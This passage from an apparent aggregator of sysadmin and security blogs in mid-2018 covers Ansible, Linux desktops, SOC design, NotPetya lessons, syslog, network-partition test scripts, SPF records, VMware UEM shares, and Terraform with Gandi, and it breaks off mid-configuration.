This Ansible callback plugin creates a VCS branch every time you run Ansible. If you ever need to go back to a certain state or environment, check out that branch and be sure nothing has changed. This is useful when you have multiple environments or multiple people deploying and you continually develop your Ansible code. When you often deploy to test / acceptance and less often to production, you can check out the last branch that deployed to production if a hotfix or other maintenance is required, without having to search back in your commits and logs. I would recommend developing infrastructure features in feature branches and keeping the master branch always deployable to production. However, reality shows that this is not always the case, and this is a nice automatic way to have a fallback.
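
Custom callback plugins generally have to be enabled before Ansible will load them; a minimal sketch (the directory path is an assumption, and the plugin name "log_vcs" is taken from the post title):

```shell
# Point Ansible at a directory containing the log_vcs callback plugin
# and whitelist it (ansible.cfg keys as of Ansible 2.x).
mkdir -p callback_plugins
cat > ansible.cfg <<'EOF'
[defaults]
callback_plugins = ./callback_plugins
callback_whitelist = log_vcs
EOF
grep log_vcs ansible.cfg
```

With that in place, the plugin runs on every `ansible-playbook` invocation from this directory.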

## July 06, 2018

### The Lone Sysadmin

#### Fixing X11 Forwarding Over SSH and with Sudo

X11 forwarding over SSH not working? Not setting $DISPLAY correctly in your shell? Having problems with X11 and sudo? Yeah, me too. Total pain in the duff. Here’s what I do to fix it. I’m thinking about Linux when I write stuff like this but a lot of this has worked on AIX and Solaris, […] The post Fixing X11 Forwarding Over SSH and with Sudo appeared first on The Lone Sysadmin. Head over to the source to read the full post!

### pagetable

#### Commodore 64 BASIC inside your USB Connector

Tomu is a super cheap Open Source Hardware 24 MHz ARM computer with 8 KB of RAM and 64 KB of ROM that fits into your USB connector! Of course I had to put Commodore 64 BASIC on it, which can be accessed through the USB-Serial port exposed by the device. It can be found in the cbmbasic subdirectory of my fork of the tomu-quickstart project. Update: It has been merged into the official tomu-quickstart repository! Use a terminal emulator to connect to the virtual serial port and hack away!

## July 05, 2018

### Michael Biven

#### Too Many Tools

A couple of months back I decided to replace macOS with Linux on my personal computer. This was based on two things. The first was the idea that I was using too many different tools on a daily basis and I wanted to thin out the list; for some unknown reason I was using multiple text editors (Ulysses, iA Writer, FoldingText, and nvALT). The second was the frustration I’ve experienced with the changes in macOS from the influence of iOS, quality issues, and Apple’s history of shedding one adapter for another in its hardware.

I spent a fair amount of time debating whether this was really necessary or whether I was just looking for another thing to tinker with, and then on the question of whether I would just install Linux on my MacBook Air or go looking for a new laptop. In the end I decided that I wanted to use the same OS I use for work, on a new laptop that would have the best support for Linux.
So I started looking for a replacement for the MacBook Air and Mac Mini I was using for personal use.

The first laptop I bought for myself was a Titanium PowerBook with Mac OS X and OS 9. At the time I was working as a contractor at IBM Global Services doing Unix support for SAP systems. There were plenty of different operating systems being used, including a mix of mainframe, HP-UX, SunOS, Solaris, IRIX, Tru64, AIX, NT4, and OS/2 Warp. There were also a number of us running personal systems with BeOS, NeXTSTEP, NetBSD, SuSE, Slackware, or Red Hat. The point being there were a lot of different ideas and approaches on what an operating system could be.

This was when the operating system you used was generally decided by what you needed to do with it. The majority of uses could be satisfied with Windows, many creative and print (design and layout) needs were handled with Mac OS, and a smaller number could be addressed with a Unix-like operating system.

For people who were building and supporting things for the web, OS X delivered something that was missing. It brought a mix of a Unix-like OS, a polished GUI, and support from a single-source vendor. The core pieces were released and open-sourced as Darwin, Jordan Hubbard (a co-founder of FreeBSD) joined Apple, and there were at least three different efforts around building or porting package management tools for it. This new direction from Apple created a lot of excitement. Ever since that TiBook I’ve owned four different Macs, and it’s only been during the last year that I’ve considered something else.

## Today the OS doesn’t matter as much

Apple seems to be losing its place as the OS of choice for development work. Microsoft has added a Linux subsystem and a builtin SSH client to Windows, contributed research and work around containers and unikernels, released a version of Linux (Azure Sphere), and runs one of the top three public clouds. Linux now looks to be the leading OS for servers and mobile.
You have Android, Chrome OS, IoT devices, support for ARM based devices, and Linux is pulling its weight in iron in the private and public clouds. Extending the computer to mobile and having the cloud as a way to pass messages between devices has opened up our options.

Now, as to which distro would replace macOS: I thought about and tried Arch, but it just ended up reminding me of Gentoo. I don’t want installing and configuring Linux to be the equivalent of re-rolling the dice for the best D&D character sheet. The majority of the machines I work with are using one of the Ubuntu LTS releases. Because of this it became the obvious pick for the OS, but it was the choice of hardware that took the most time.

Originally I was looking at System76, Lenovo, and Dell. At the time there was a bit of a debate between System76 and GNOME over firmware updates from LVFS, and some of the comments from System76 left me with the impression that this is a company I’ll avoid for now. It was a review from Linux Journal that introduced me to the Librem laptops from Purism. Their focus on privacy and security, delivered in a product with a simple aesthetic, is what sold me. I settled on buying a Librem 15v3 and planned to install Ubuntu 18.04 LTS. I did give thought to sticking with Purism’s own OS (PureOS) and I may try it at a later time, but for now I want to be using the same tools at work and at home.

The thing that was the most intimidating was the idea of using Linux as a desktop replacement again. It’s been almost two decades since I last used a GUI on Linux. That’s a long time to catch up on changes in GNOME and KDE, and then I came across AppImage, Flatpak, and Snaps.

## Deliver Update Publish Execute System (DUPES)

My first thought was great, another set of package tools to navigate, but I think that was a short-sighted view of what they provide. They’re more than just package and dependency managers.
They’re closer to the architecture of an app store paired with the process to execute an app. To make it easier for myself I just started thinking of them as “dupes” instead of package management tools:

• Delivery — how the application is delivered to the user.
• Update — how the application updates (e.g., auto, delta).
• Publish — the process of building the app with dependencies for delivery.
• Execute — how the application is run and the level of isolation provided.
• System — tooling to provide the previous four points.

## The Browser, Editor, and Terminal

Most of the time I’m using one of three different types of applications: a browser, a text editor, or a terminal. The other native applications are tools for specific purposes. In some cases I use the iOS version, because it’s easier to hold a tablet while reading, streaming something, or playing music.

Before I placed the order I started listing out the applications I use on a regular basis. A number of these apps were macOS / iOS only, but the ones I really cared about keeping either had a native Linux or iOS version available. The idea became to use Linux on the laptop and continue with the pairing of iOS and watchOS on the phone, tablet, and watch. All I needed was to add a stand for the iPad Pro, reuse the keyboard from the Mac Mini, and use the cloud to transfer files, and I was set. Any development, personal projects, or anything technical would be done on the Librem. Things like budgeting, health / fitness tracking, reading, writing, and streaming would be on the iPad Pro, iPhone, or Apple Watch.

Note: The lack of an IM client that supports Messages has been the most difficult hurdle. My wife and I both have iPhones and she has a Mac. By giving up macOS I’m forced to rely on my phone or tablet when chatting with her. And if one of us wants to send the other a link there’s a bit of a shell game needed if I want it on or send it from Linux.
## Impressions after a Month

So far I’ve been happy with my choice. The only issue I’ve had is that after an update for Ubuntu the firmware needed for the Bluetooth module was uninstalled, and the wireless seems to require that I use the wicd network manager instead of managing the wireless through Settings or the GNOME shell.

The configuration I ordered for the Librem included a 500GB NVMe drive that’s used for the OS and a second 120GB SSD drive. I run Gitlab and Nextcloud locally as containers that are both mounted on the second drive. This gives me some flexibility in how to transfer files between devices and I’ve enjoyed having a local set of tools I control.

There are a few things on the list to consider: replacing 1Password with Bitwarden, and deciding how I’ll do backups. Right now I’m thinking of something like Restic with B2 as the remote repository. Overall the change feels like I made the right choice.

## July 04, 2018

### Sarah Allen

#### optimize for results, not optics

Jennifer Anastasoff served as the head of people for the United States Digital Service (USDS). She grew that organization from a small team of three to an office of over 200 people in just two years. On today’s Friction Podcast, she talks with Bob Sutton about fixing government friction.

I had been a Presidential Innovation Fellow in 2013, living through a government shutdown and witnessing the failure of healthcare.gov, then hearing about the slow and steady work that revived it, over a matter of months, into a functioning website that allowed people to sign up for services they needed. Later, when I was at 18F, I collaborated with Jennifer on a few projects. We worked behind the scenes to bring stories of results to the tech folks in San Francisco and elsewhere across the country. In those early days, before the USDS had a website, I don’t recall the formal statement of values that she talks about on the podcast.
I worked closely with many of the folks at USDS and these values were evidenced in the work:

• Hire and empower great people.
• Find the truth, tell the truth.
• Optimize for results, not optics.
• Go where the work is.
• Create momentum.

Maybe they were on the wall somewhere at USDS HQ when I was there for a meeting or just to unwind with people facing the same tough challenges. I do remember the hockey table and that room with the wires in the old townhouse where Teddy Roosevelt used to live with his family. Working in spaces where great history happened couldn’t feel more surreal than trying to figure out if it was really true that A/B testing was illegal.

In the interview, Jennifer talks about how people would say that “in government, we’re not allowed to break the rules…” However, a lot of the time it was how the rules were interpreted: “if it doesn’t explicitly say something is possible, then it’s not possible. And that’s just not the case.” But you can’t just reinterpret things by yourself. We needed technical folks who could work with lawyers and policy experts, doing the challenging work of figuring out a solution that would work and was legal.

I have great respect and empathy for the government workers who would routinely say “no” out of fear. It is pretty scary to realize that something you might do in the normal course of your work might actually break a law, which could literally cause you or your boss to be called in front of Congress to explain your actions.

“There’s very little room in all of this for a hero narrative,” she says in the podcast. We accomplished much by giving credit to our government colleagues who stepped up and took a leadership role in this work. We were temporary employees. We could go back to our easy tech jobs, and these folks would need to continue the work.
There’s a different kind of hero narrative, which requires each of us to step up in the moment, say the thing in the meeting that no one wants to say, or ask the naive question, or simply read a thousand pages of regulation until you find that one clause that lets you do the thing. You perform the everyday heroics that let you try something new, and that sets a pattern for you and your colleagues, and future generations of government workers, to be empowered to effectively help the people they serve.

Jennifer Anastasoff is my kind of hero. Listen to the full interview with Jennifer Anastasoff and hear about the everyday heroics of how people really make history.

p.s. The work continues. Consider applying as an Innovation Fellow — deadline is July 6th!

## July 02, 2018

### The Lone Sysadmin

#### Fixing Veeam Backup & Replication Proxy Install Errors

Every once in a while I struggle a little to add a new Veeam Backup & Replication hot-add proxy. If you’re like me and seeing proxy install errors maybe some of these will fix you up. This is what worked for me on Windows Server 2016 when I was getting error 0x00000057, “Failed to create persistent […] The post Fixing Veeam Backup & Replication Proxy Install Errors appeared first on The Lone Sysadmin. Head over to the source to read the full post!

### Steve Kemp's Blog

#### Another golang port, this time a toy virtual machine

I don't understand why my toy virtual machine has as much interest as it does. It is a simple project that compiles "assembly language" into a series of bytecodes, and then allows them to be executed. Since I recently started messing around with interpreters more generally I figured I should revisit it. Initially I rewrote the part that interprets the bytecodes in golang, which was simple, but now I've rewritten the compiler too.
Much like the previous work with interpreters this uses a lexer and an evaluator to handle things properly - in the original implementation the compiler used a series of regular expressions to parse the input files. Oops.

Anyway the end result is that I can compile a source file to bytecodes, execute bytecodes, or do both at once.

I made a couple of minor tweaks in the port, because I wanted extra facilities. Rather than implement an opcode "STRING_LENGTH" I copied the idea of traps - so a program can call back to the interpreter to run some operations:

    int 0x00 -> Set register 0 with the length of the string in register 0.
    int 0x01 -> Set register 0 with the contents of reading a string from the user

etc.

This notion of traps should allow complex operations to be implemented easily, in golang. I don't think I have the patience to do too much more, but it stands as a simple example of a "compiler" or an interpreter. I think this program is the longest I've written. Remember how verbose assembly language is?

Otherwise: Helsinki Pride happened, Oiva learned to say his name (maybe?), and I finished reading all the James Bond novels (which were very different to the films, and have aged badly on the whole).

## July 01, 2018

### Raymii.org

#### Windows 7 installer on a KVM Linux VPS (Windows on Digital Ocean)

For fun I wanted to install Windows 7 on a KVM Linux VPS (on Digital Ocean, but it should work for any KVM or XEN-HVM VPS with console access). I was experimenting with Grub2 and ISO booting, since Grub2 can natively boot a Linux ISO. For Windows this is not possible; the installer needs to be extracted onto a FAT32 partition from which you boot. On a normal system I would repartition the disk using a live CD, but on a VPS where an ISO cannot be booted this is troublesome. If I could boot from an ISO I would use that to install Windows, but where's the fun in that?
I had to figure out how to shrink an EXT4 filesystem on a running Ubuntu VPS, which is possible, however very risky, with pivot_root. Next the partition table can be converted to MBR, the partition can be resized, a FAT32 partition and filesystem can be created, the Windows installer files copied onto that, and after some Grub config and a reboot, you're in the Windows 7 installer.

## June 28, 2018

### TaoSecurity

#### Why Do SOCs Look Like This?

When you hear the word "SOC," or the phrase "security operations center," what image comes to mind? Do you think of analysts sitting at desks, all facing forward, towards giant screens? Why is this?

The following image is from the outstanding movie Apollo 13, a docudrama about the challenged 1970 mission to the moon. It's a screen capture from the go-for-launch sequence. It shows mission control in Houston, Texas. If you'd like to see video of the actual center from 1970, check out This Is Mission Control. Mission control looks remarkably like a SOC, doesn't it?

When builders of computer security operations centers imagined what their "mission control" rooms would look like, perhaps they had Houston in mind? Or perhaps they thought of the 1983 movie War Games? Reality was way more boring, however: I visited NORAD under Cheyenne Mountain in 1989, I believe, when visiting the Air Force Academy as a high school senior. I can confirm it did not look like the movie depiction!

Let's return to mission control. Look at the resources available to personnel manning the mission control room. The big screens depict two main forms of data: telemetry and video of the rocket. What about the individual screens, where people sit? They are largely customized. Each station presents data or buttons specific to the role of the person sitting there. Listen to Ed Harris' character calling out the stations: booster, retro, vital, etc.

This is one of the key differences between mission control and any modern computerized operations center.
In the 1960s and 1970s, workstations (literally, places where people worked) had to be customized. They lacked the technology to have generic workstations where customization was done via screen, keyboard, and mouse. They also lacked the ability to display video on demand, and relied on large television screens. Personnel with specific functions sat at specific locations, because that was literally the only way they could perform their jobs.

With the advent of modern computing, every workstation is instantly customizable. There is no need to specialize. Anyone can sit anywhere, assuming computers allow one's workspace to follow their logon. In fact, modern computing allows a user to sit in spaces outside of their office. A modern mission control could be distributed.

With that in mind, what does the current version of mission control look like? Here is a picture of the modern Johnson Space Center's mission control room. It looks similar to the 1960s-1970s version, except it's dominated by screens, keyboards, and mice.

What strikes me about every image of a "SOC" that I've ever seen is that no one is looking at the big screens. They are almost always deployed for an audience. No one in an operational role looks at them.

There are exceptions. Check out the Arizona Department of Transportation operations center. Their "big screen" is a composite of 24 smaller screens showing traffic and roadways. No one is looking at the screen, but that sort of display is perfect for the human eye. It's a variant of Edward Tufte's "small multiple" idea. There is no text. The eye can discern if there is a lot of traffic, or little traffic, or an accident pretty easily. It's likely more for the benefit of an audience, but it works decently well.

Compare those screens to what one is likely to encounter in a cyber SOC. In addition to a "pew pew" map and a "spinning globe of doom," it will likely look like this, from R3 Cybersecurity: The big screens are a waste of time.
No one is standing near them. No one sitting at their workstations can read what the screens show. They are purely for an audience, who can't discern what they show either.

The bottom line for this post is that if you're going to build a "SOC," don't build it based on what you've seen in the movies, or in other industries, or what a consultancy recommends. Spend some time determining your SOC's purpose, and let the workflow drive the physical setting. You may determine you don't even need a "SOC," either physically or logically, based on maturing understandings of a SOC's mission. That's a topic for a future post!

## June 27, 2018

### Errata Security

#### Lessons from nPetya one year later

This is the one year anniversary of NotPetya. It was probably the most expensive single hacker attack in history (so far), with FedEx estimating it cost them $300 million. Shipping giant Maersk and drug giant Merck suffered losses on a similar scale. Many are discussing lessons we should learn from this, but they are the wrong lessons.

An example is this quote in a recent article:
"One year on from NotPetya, it seems lessons still haven't been learned. A lack of regular patching of outdated systems because of the issues of downtime and disruption to organisations was the path through which both NotPetya and WannaCry spread, and this fundamental problem remains."
This is an attractive claim. It describes the problem in terms of people being "weak" and the solution as being "strong". If only organizations were strong enough, willing to deal with downtime and disruption, then problems like this wouldn't happen.

But this is wrong, at least in the case of NotPetya.

NotPetya's spread was initiated through the Ukrainian company MeDoc, which provided tax accounting software. It had an auto-update process for keeping its software up-to-date. This was subverted in order to deliver the initial NotPetya infection. Patching had nothing to do with this. Other common security controls, like firewalls, were also bypassed.

Auto-updates and cloud-management of software and IoT devices is becoming the norm. This creates a danger for such "supply chain" attacks, where the supplier of the product gets compromised, spreading an infection to all their customers. The lesson organizations need to learn about this is how such infections can be contained. One way is to firewall such products away from the core network. Another solution is port-isolation/microsegmentation, that limits the spread after an initial infection.
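
As a sketch of the firewalling idea, one could allow an auto-updating appliance to reach the internet for its updates while blocking it from the core network. Everything here is invented for illustration: the addresses, the interface name, and the placement of the rules; real segmentation would be designed around your own topology.

```shell
# Hypothetical addresses: appliance at 10.9.9.10, core network 10.0.0.0/16.
# Drop anything the appliance sends toward the internal core network...
iptables -A FORWARD -s 10.9.9.10 -d 10.0.0.0/16 -j DROP
# ...but still let it out to the internet (via eth0) for vendor updates.
iptables -A FORWARD -s 10.9.9.10 -o eth0 -j ACCEPT
```

The point is containment: if the vendor's update channel is compromised, the infected appliance has no route into the rest of the network.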

Once NotPetya got into an organization, it spread laterally. The chief way it did this was through Mimikatz/PsExec, reusing Windows credentials. It stole whatever login information it could get from the infected machine and used it to try to log on to other Windows machines. If it got lucky getting domain administrator credentials, it then spread to the entire Windows domain. This was the primary method of spreading, not the unpatched ETERNALBLUE vulnerability. This is why it was so devastating to companies like Maersk: it wasn't a matter of a few unpatched systems getting infected, it was a matter of losing entire domains, including the backup systems.

Such spreading through Windows credentials continues to plague organizations. A good example is the recent ransomware infection of the City of Atlanta that spread much the same way. The limits of the worm were the limits of domain trust relationships. For example, it didn't infect the city airport because that Windows domain is separate from the city's domains.

This is the most pressing lesson organizations need to learn, the one they are ignoring. They need to do more to prevent desktops from infecting each other, such as through port-isolation/microsegmentation. They need to control the spread of administrative credentials within the organization. A lot of organizations put the same local admin account on every workstation which makes the spread of NotPetya style worms trivial. They need to reevaluate trust relationships between domains, so that the admin of one can't infect the others.

These solutions are difficult, which is why news articles don't mention them. You don't have to know anything about security to proclaim "the problem is lack of patches". It's moral authority, chastising the weak, rather than a prescription of what to do. Solving supply chain hacks and Windows credential sharing, though, is hard. I don't know any universal solution to this -- I'd have to thoroughly analyze your network and business in order to make any useful recommendation. Such complexity means it's not going to appear in news stories -- they'll stick with the simple soundbites instead.

By the way, this doesn't mean ETERNALBLUE was inconsequential in NotPetya's spread. Imagine an organization that is otherwise perfectly patched, except for that one out-dated test system that was unpatched -- which just so happened to have an admin logged in. It hops from the accounting desktop (with the autoupdate) to the test system via ETERNALBLUE, then from the test system to the domain controller via the admin credentials, and then to the rest of the domain. What this story demonstrates is not the importance of keeping 100% up-to-date on patches, because that's impossible: there will always be a system lurking somewhere unpatched. Instead, the lesson is the importance of not leaving admin credentials lying around.

So the lesson you need to learn from NotPetya is not to keep systems patched, but to deal with hostile autoupdates coming from deep within your network, and most importantly, to stop the spread of malware through trust relationships and loose admin credentials lying around.

## June 26, 2018

### TaoSecurity

#### Bejtlich on the APT1 Report: No Hack Back

Before reading the rest of this post, I suggest reading Mandiant/FireEye's statement Doing Our Part -- Without Hacking Back.

I would like to add my own color to this situation.

First, at no time when I worked for Mandiant or FireEye, or afterwards, was there ever a notion that we would hack into adversary systems. During my six year tenure, we were publicly and privately a "no hack back" company. I never heard anyone talk about hack back operations. No one ever intimated we had imagery of APT1 actors taken with their own laptop cameras. No one even said that would be a good idea.

Second, I would never have testified or written, repeatedly, about our company's stance on not hacking back if I knew we secretly did otherwise. I have quit jobs because I had fundamental disagreements with company policy or practice. I worked for Mandiant from 2011 through the end of 2013, when FireEye acquired Mandiant, and stayed until last year (2017). I never considered quitting Mandiant or FireEye due to a disconnect between public statements and private conduct.

Third, I was personally involved with briefings to the press, in public and in private, concerning the APT1 report. I provided the voiceover for a 5 minute YouTube video called APT1: Exposing One of China's Cyber Espionage Units. That video was one of the most sensitive, if not the most sensitive, aspects of releasing the report. We showed the world how we could intercept adversary communications and reconstruct them. There was internal debate about whether we should do that. We decided to cover the practice in the report, as Christopher Glyer Tweeted:

In none of these briefings to the press did we show pictures or video from adversary laptops. We did show the video that we published to YouTube.

Fourth, I privately contacted former Mandiant personnel with whom I worked during the time of the APT1 report creation and distribution. Their reaction to Mr Sanger's allegations ranged from "I've never heard of that" to "completely false." I deliberately asked former Mandiant colleagues, like myself, in case current Mandiant or FireEye employees had been told not to talk to outsiders about the case.

What do I think happened here? I agree with the theory that Mr Sanger misinterpreted the reconstructed RDP sessions as some sort of "camera access." I have no idea about the "bros" or "leather jackets" comments!

In the spirit of full disclosure, prior to publication, Mr Sanger tried to reach me to discuss his book via email. I was sick and told him I had to pass. Ellen Nakashima also contacted me; I believe she was doing research for the book. She asked a few questions about the origin of the term APT, which I answered. I do not have the book so I do not know if I am cited, or if my message was included.

The bottom line is that Mandiant and FireEye did not conduct any hack back for the APT1 report.

Update: Some of you wondered about Ellen's role. I confirmed last night that she was working on her own project.

## June 21, 2018

### Raymii.org

#### Syslog configuration for remote logservers for syslog-ng and rsyslog, both client and server

Syslog is the protocol, format (and software) that linux and most networking devices use to log messages -- all kinds of messages: system, authentication, login and applications. There are multiple implementations of syslog, like syslog-ng and rsyslog. Syslog has the option to log to a remote server and to act as a remote logserver (one that receives logs). With a remote logging server you can archive your logs and keep them secure: when a machine gets hacked and root is compromised, the logs on that machine are no longer trustworthy. This tutorial shows how to set up a syslog server with rsyslog and syslog-ng, and how to set up servers as syslog clients (that log to a remote server) with syslog-ng and rsyslog.
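As a taste of what the rsyslog half of such a setup involves, a minimal client/server pairing might look like this (the hostname and file names are hypothetical illustrations; the full tutorial covers syslog-ng as well):

```
# Client: /etc/rsyslog.d/50-remote.conf
# @@ forwards over TCP; a single @ would use UDP instead.
*.* @@logserver.example.com:514

# Server: /etc/rsyslog.d/50-listen.conf
# Load the TCP input module and accept syslog from clients on port 514.
module(load="imtcp")
input(type="imtcp" port="514")
```

Restart rsyslog on both sides after the change, and the client's messages should start appearing in the server's logs.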

## June 20, 2018

#### Network Split Test Scripts

Today I want to share two simple scripts for simulating a network split and rejoin between two groups of hosts. The split is done by adding per-host network blackhole routes on each host for all hosts of the other group.

Please be careful with using this. A forgotten blackhole route can result in long hours of debugging, since blackhole routes are something you rarely use nowadays.

### Script Usage

./network_split.sh <filter1> <filter2> <hosts>
./network_join.sh <filter1> <filter2> <hosts>

The script expects SSH equivalency and sudo on the target hosts. The filters are grep patterns.
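As a sanity check, the group-splitting logic the scripts use internally can be exercised on its own (the host names here are hypothetical):

```shell
# xargs -n1 puts one host per line, grep then selects each group
# by its filter pattern -- exactly what the scripts do below.
hosts="db1 db2 app1 app2"
hosts1=$(echo $hosts | xargs -n1 | grep "db")
hosts2=$(echo $hosts | xargs -n1 | grep "app")
echo "group1: $hosts1"
echo "group2: $hosts2"
```

Any host matching neither filter ends up in no group and keeps full connectivity.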

### network_split.sh

#!/bin/bash

group1_filter=$1; shift
group2_filter=$1; shift
hosts=$*

hosts1=$(echo $hosts | xargs -n1 | grep "$group1_filter")
hosts2=$(echo $hosts | xargs -n1 | grep "$group2_filter")

if [ "$hosts1" == "" -o "$hosts2" == "" ]; then
    echo "ERROR: Syntax: $0 <filter1> <filter2> <hosts>"
    exit 1
fi

for h in $hosts1; do
    echo "Blacklisting other zone on $h"
    for i in $hosts2; do
        ssh $h sudo route add $i gw 127.0.0.1 lo
    done
done

for h in $hosts2; do
    echo "Blacklisting other zone on $h"
    for i in $hosts1; do
        ssh $h sudo route add $i gw 127.0.0.1 lo
    done
done


### network_join.sh

#!/bin/bash

group1_filter=$1; shift
group2_filter=$1; shift
hosts=$*

hosts1=$(echo $hosts | xargs -n1 | grep "$group1_filter")
hosts2=$(echo $hosts | xargs -n1 | grep "$group2_filter")

if [ "$hosts1" == "" -o "$hosts2" == "" ]; then
    echo "ERROR: Syntax: $0 <filter1> <filter2> <hosts>"
    exit 1
fi

for h in $hosts1; do
    echo "De-blacklisting other zone on $h"
    for i in $hosts2; do
        ssh $h sudo route del $i gw 127.0.0.1 lo
    done
done

for h in $hosts2; do
    echo "De-blacklisting other zone on $h"
    for i in $hosts1; do
        ssh $h sudo route del $i gw 127.0.0.1 lo
    done
done


## June 15, 2018

#### Google has changed GSuite's SPF records

(DNSControl unrolls your SPF records safely and automatically. Sure, you can do it manually, but at the end of this article I'll show you how to automate it so you can 'set it and forget it'.)

Google has changed the SPF records for GSuite. You don't have to make any changes since you still do include:_spf.google.com and the magic of SPF takes care of things for you.

However, if you unroll your SPF records to work around the 10-lookup limit, you need to take a look at what you've done and re-do it based on the new SPF records.

The change is simple: They've added two new CIDR blocks (ip4:35.191.0.0/16 ip4:130.211.0.0/22) to _netblocks3.google.com
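To make the unrolling concern concrete, here is a sketch with a hypothetical example.com zone (the elided mechanisms stand in for the rest of Google's netblocks):

```
; Unaffected setup: a single include, resolved at mail-receipt time
example.com.  TXT  "v=spf1 include:_spf.google.com ~all"

; Unrolled setup: the CIDRs are copied inline, so the two new ranges
; must now be appended by hand
example.com.  TXT  "v=spf1 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ... ~all"
```

The include form tracks Google's changes automatically; the unrolled form trades that for staying under the 10-lookup limit, which is why it needs manual (or automated) maintenance.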

99.99% of all GSuite users don't have to do anything.

### Sean's IT Blog

#### Getting Started With UEM Part 2: Laying The Foundation – File Services

In my last post on UEM, I discussed the components and key considerations that go into deploying VMware UEM.  UEM is made up of multiple components that rely on a common infrastructure of file shares and Group Policy to manage the user environment, and in this post, we will cover how to deploy the file share infrastructure.

There are two file shares that we will be deploying.  These file shares are:

• UEM Configuration File Share
• UEM User Data Share

### Configuration File Share

The first of the two UEM file shares is the configuration file share.  This file share holds the configuration data used by the UEM agent that is installed in the virtual desktops or RDSH servers.

The UEM configuration share contains a few important subfolders.  These subfolders are created by the UEM management console during its initial setup, and they align with various tabs in the UEM Management Console.  We will discuss this more in a future article on using the UEM Management console.

• General – This is the primary subfolder on the configuration share, and it contains the main configuration files for the agent.
• FlexRepository – This subfolder under General contains all of the settings configured on the “User Environment” tab.  The settings in this folder tell the UEM agent how to configure policies such as Application Blocking, Horizon Smart Policies, and ADMX-based settings.

Administrators can create their own subfolders for organizing application and Windows personalization settings.  These are created in the user personalization tab, and when a folder is created in the UEM Management Console, it is also created on the configuration share.  Some folders that I use in my environment are:

• Applications – This is the first subfolder underneath the General folder.  This folder contains the INI files that tell the UEM agent how to manage application personalization.  The Applications folder makes up one part of the “Personalization” tab.
• Windows Settings – This folder contains the INI files that tell the UEM agent how to manage the Windows environment personalization.  The Windows Settings folder makes up the other part of the Personalization tab.
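Pulling those folders together, the configuration share might end up looking something like this (the server and share names are hypothetical):

```
\\fileserver\UEMConfig\
└── General\
    ├── FlexRepository\       <- "User Environment" tab settings
    ├── Applications\         <- application personalization INI files
    └── Windows Settings\     <- Windows personalization INI files
```

The Applications and Windows Settings folders back the two halves of the Personalization tab, while FlexRepository holds everything configured on the User Environment tab.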

Some environments are a little more complex, and they require additional configuration sets for different use cases.  UEM can create a silo for specific settings that should only be applied to certain users or groups of machines.  A silo can have any folder structure you choose to set up – it can be a single application configuration file or it can be an entire set of configurations with multiple sub-folders.  Each silo also requires its own Group Policy configuration.

### User Data File Share

The second UEM file share is the user data file share.  This file share holds the user data that is managed by UEM.  This is where any captured application profiles are stored. It can also contain other user data that may not be managed by UEM such as folders managed by Windows Folder Redirection.  I’ve seen instances where the UEM User Data Share also contained other data to provide a single location where all user data is stored.

The key thing to remember about this share is that it is a user data share.  These folders belong to the user, and they should be secured so that other users cannot access them.  IT administrators, system processes such as antivirus and backup engines, and, if allowed by policy, the helpdesk should also have access to these folders to support the environment.

User application settings data is stored on the share.  This consists of registry keys and files and folders from the local user profile.  When this data is captured by the UEM agent, it is compressed in a zip file before being written out to the network.  The user data folder also can contain backup copies of user settings, so if an application gets corrupted, the helpdesk or the user themselves can easily roll back to the last configuration.

UEM also allows log data to be stored on the user data share.  The log contains information about activities that the UEM agent performs during logon, application launch and close, and logoff, and it provides a wealth of troubleshooting information for administrators.

### UEM Shared Folder Replication

VMware UEM is perfect for multi-site end-user computing environments because it only reads settings and data at logon and writes back to the share at user logoff.  If FlexDirect is enabled for applications, it will also read during an application launch and write back when the last instance of the application is closed.  This means that it is possible to replicate UEM data to other file shares, and the risk of file corruption is minimized due to file locks being minimized.

Both the UEM Configuration Share and the UEM User Data share can be replicated using various file replication technologies.

### DFS Namespaces

As environments grow or servers are retired, this UEM data may need to be moved to new locations.  Or it may need to exist in multiple locations to support multiple sites.  In order to simplify the configuration of UEM and minimize the number of changes that are required to Group Policy or other configurations, I recommend using DFS Namespaces to provide a single namespace for the file shares.  This allows users to use a single path to access the file shares regardless of their location or the servers that the data is located on.

### UEM Share Permissions

It’s not safe to assume that everyone is using Windows-based file servers to provide file services in their environment.  Because of that, setting up network shares is beyond the scope of this post.  The process of creating the share and applying security varies based on the device hosting the share.

The required Share and NTFS/File permissions are listed in the table below. These contain the basic permissions that are required to use UEM.  The share permissions required for the HelpDesk tool are not included in the table.

### Wrapup and Next Steps

This post just provided a basic overview of the required UEM file shares and user permissions.  If you’re planning to do a multi-site environment or have multiple servers, this would be a good time to configure replication.

The next post in this series will cover the setup and initial configuration of the UEM management infrastructure.  This includes setting up the management console and configuring Group Policy.

## June 13, 2018

#### Terraform Gandi

This blog post contains my notes on working with Gandi through Terraform. I’ve replaced my domain name with example.com, but pretty much everything should work as advertised.

The main idea is that Gandi has a DNS API: LiveDNS API, and we want to manage our domain & records (dns infra) in such a manner that we will not do manual changes via the Gandi dashboard.

## Terraform

Although this is partially a terraform blog post, I will not go into much detail on terraform. I am still reading on the matter and hopefully at some point in the (near) future I’ll publish my terraform notes, as I did with Packer a few days ago.

### Installation

Download the latest terraform release (a golang static 64bit binary) and install it to our system:

$ curl -sLO https://releases.hashicorp.com/terraform/0.11.7/terraform_0.11.7_linux_amd64.zip
$ unzip terraform_0.11.7_linux_amd64.zip
$ sudo mv terraform /usr/local/bin/

### Version

Verify terraform by checking the version:

$ terraform version
Terraform v0.11.7

## Terraform Gandi Provider

There is a community terraform provider for gandi: Terraform provider for the Gandi LiveDNS by Sébastien Maccagnoni (aka tiramiseb) that is simple and straightforward.

### Build

You can build the gandi provider in any distro and just copy the binary to your primary machine/server or build box.
Below are my personal (docker) notes:

$ mkdir -pv /root/go/src/
$ cd /root/go/src/

$ git clone https://github.com/tiramiseb/terraform-provider-gandi.git
Cloning into 'terraform-provider-gandi'...
remote: Counting objects: 23, done.
remote: Total 23 (delta 0), reused 0 (delta 0), pack-reused 23
Unpacking objects: 100% (23/23), done.

$ cd terraform-provider-gandi/

$ go get
$ go build -o terraform-provider-gandi

$ ls -l terraform-provider-gandi
-rwxr-xr-x 1 root root 25788936 Jun 12 16:52 terraform-provider-gandi

Copy terraform-provider-gandi to the same directory as the terraform binary.

## Gandi API Token

Login into your gandi account, go through security and retrieve your API token. The token should be a long alphanumeric string.

## Repo Structure

Let’s create a simple repo structure. Terraform will read all files from our directory that end with .tf

$ tree
.
├── main.tf
└── vars.tf
• main.tf will hold our dns infra
• vars.tf will have our variables

### Files

vars.tf

variable "gandi_api_token" {
  description = "A Gandi API token"
}

variable "domain" {
